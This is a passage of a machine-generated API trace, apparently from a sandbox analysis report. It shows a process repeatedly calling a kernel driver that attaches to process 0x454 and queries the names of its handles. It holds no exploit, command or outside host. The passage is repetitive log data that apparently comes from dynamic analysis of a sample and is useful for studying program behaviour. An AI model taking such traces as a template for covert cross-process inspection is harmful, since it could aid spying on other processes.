IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.345] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.345] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.345] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.345] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.345] PsAcquireProcessExitSynchronization () returned 0x0 [0245.345] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.345] ObReferenceObjectByHandle (in: Handle=0x514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038734b0, HandleInformation=0x0) returned 0x0 [0245.345] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.345] PsReleaseProcessExitSynchronization () returned 0x2 [0245.345] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.345] ObQueryNameString (in: Object=0xfffffa80038734b0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.345] ObfDereferenceObject (Object=0xfffffa80038734b0) returned 0x2 [0245.345] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.345] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.345] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.345] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.345] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.345] PsAcquireProcessExitSynchronization () returned 0x0 [0245.345] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.345] ObReferenceObjectByHandle (in: Handle=0x51c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003879770, HandleInformation=0x0) returned 0x0 [0245.345] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.346] PsReleaseProcessExitSynchronization () returned 0x2 [0245.346] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.346] ObQueryNameString (in: Object=0xfffffa8003879770, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.346] ObfDereferenceObject (Object=0xfffffa8003879770) returned 0x2 [0245.346] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.346] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.346] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.346] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0245.346] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.346] PsAcquireProcessExitSynchronization () returned 0x0 [0245.346] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.346] ObReferenceObjectByHandle (in: Handle=0x524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003879620, HandleInformation=0x0) returned 0x0 [0245.346] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.346] PsReleaseProcessExitSynchronization () returned 0x2 [0245.346] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.346] ObQueryNameString (in: Object=0xfffffa8003879620, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.346] ObfDereferenceObject (Object=0xfffffa8003879620) returned 0x2 [0245.346] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.346] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.346] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.346] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0245.346] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.346] PsAcquireProcessExitSynchronization () returned 0x0 [0245.346] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.346] ObReferenceObjectByHandle (in: Handle=0x52c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e6f2c0, HandleInformation=0x0) returned 0x0 [0245.346] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.346] PsReleaseProcessExitSynchronization () returned 0x2 [0245.346] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.346] ObQueryNameString (in: Object=0xfffffa8002e6f2c0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.346] ObfDereferenceObject (Object=0xfffffa8002e6f2c0) returned 0x2 [0245.347] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.347] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.347] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.347] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0245.347] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.347] PsAcquireProcessExitSynchronization () returned 0x0 [0245.347] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.347] ObReferenceObjectByHandle (in: Handle=0x534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034aa680, HandleInformation=0x0) returned 0x0 [0245.347] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.347] PsReleaseProcessExitSynchronization () returned 0x2 [0245.347] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.347] ObQueryNameString (in: Object=0xfffffa80034aa680, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.347] ObfDereferenceObject (Object=0xfffffa80034aa680) returned 0x2 [0245.347] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.347] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.347] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.347] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0245.347] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.347] PsAcquireProcessExitSynchronization () returned 0x0 [0245.347] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.347] ObReferenceObjectByHandle (in: Handle=0x53c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800383e070, HandleInformation=0x0) returned 0x0 [0245.347] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.347] PsReleaseProcessExitSynchronization () returned 0x2 [0245.347] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.347] ObQueryNameString (in: Object=0xfffffa800383e070, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.347] ObfDereferenceObject (Object=0xfffffa800383e070) returned 0x2 [0245.347] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.347] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.347] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.347] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.348] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.348] PsAcquireProcessExitSynchronization () returned 0x0 [0245.348] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.348] ObReferenceObjectByHandle (in: Handle=0x554, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a49220, HandleInformation=0x0) returned 0x0 [0245.348] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.348] PsReleaseProcessExitSynchronization () returned 0x2 [0245.348] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.348] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.348] ObfDereferenceObject (Object=0xfffffa8003a49220) returned 0x1 [0245.348] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.348] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.348] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.348] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.348] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.348] PsAcquireProcessExitSynchronization () returned 0x0 [0245.348] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.348] ObReferenceObjectByHandle (in: Handle=0x56c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fa3cb0, HandleInformation=0x0) returned 0x0 [0245.348] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.348] PsReleaseProcessExitSynchronization () returned 0x2 [0245.348] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.348] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.348] ObfDereferenceObject (Object=0xfffffa8001fa3cb0) returned 0x1 [0245.348] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.348] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.348] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.348] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.348] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.348] PsAcquireProcessExitSynchronization () returned 0x0 [0245.348] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.348] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017b7960, HandleInformation=0x0) returned 0x0 [0245.348] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.349] PsReleaseProcessExitSynchronization () returned 0x2 [0245.349] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.349] ObQueryNameString (in: Object=0xfffff8a0017b7960, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.349] ObfDereferenceObject (Object=0xfffff8a0017b7960) returned 0x1 [0245.349] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.349] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.349] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.349] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.349] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.349] PsAcquireProcessExitSynchronization () returned 0x0 [0245.349] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.349] ObReferenceObjectByHandle (in: Handle=0x574, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fa42b0, HandleInformation=0x0) returned 0x0 [0245.349] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.349] PsReleaseProcessExitSynchronization () returned 0x2 [0245.349] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.349] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.349] ObfDereferenceObject (Object=0xfffffa8001fa42b0) returned 0x1 [0245.349] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.349] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.349] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.349] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.349] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.349] PsAcquireProcessExitSynchronization () returned 0x0 [0245.349] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.349] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003993f20, HandleInformation=0x0) returned 0x0 [0245.349] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.349] PsReleaseProcessExitSynchronization () returned 0x2 [0245.349] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.349] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.349] ObfDereferenceObject (Object=0xfffffa8003993f20) returned 0x1 [0245.349] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.350] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.350] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.350] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.350] PsAcquireProcessExitSynchronization () returned 0x0 [0245.350] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.350] ObReferenceObjectByHandle (in: Handle=0x58c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003993dd0, HandleInformation=0x0) returned 0x0 [0245.350] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.350] PsReleaseProcessExitSynchronization () returned 0x2 [0245.350] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.350] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.350] ObfDereferenceObject (Object=0xfffffa8003993dd0) returned 0x1 [0245.350] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.350] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.350] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0245.350] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.350] PsAcquireProcessExitSynchronization () returned 0x0 [0245.350] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.350] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003993c80, HandleInformation=0x0) returned 0x0 [0245.350] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.350] PsReleaseProcessExitSynchronization () returned 0x2 [0245.350] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.350] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.350] ObfDereferenceObject (Object=0xfffffa8003993c80) returned 0x1 [0245.350] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.350] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.350] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.350] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.350] PsAcquireProcessExitSynchronization () returned 0x0 [0245.351] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.351] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017bb060, HandleInformation=0x0) returned 0x0 [0245.351] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.351] PsReleaseProcessExitSynchronization () returned 0x2 [0245.351] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.351] ObQueryNameString (in: Object=0xfffff8a0017bb060, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.351] ObfDereferenceObject (Object=0xfffff8a0017bb060) returned 0x1 [0245.351] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.351] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.351] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.351] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.351] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.351] PsAcquireProcessExitSynchronization () returned 0x0 [0245.351] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.351] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003993b30, HandleInformation=0x0) returned 0x0 [0245.351] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.351] PsReleaseProcessExitSynchronization () returned 0x2 [0245.351] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.351] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.351] ObfDereferenceObject (Object=0xfffffa8003993b30) returned 0x1 [0245.351] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.351] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.351] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.351] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, 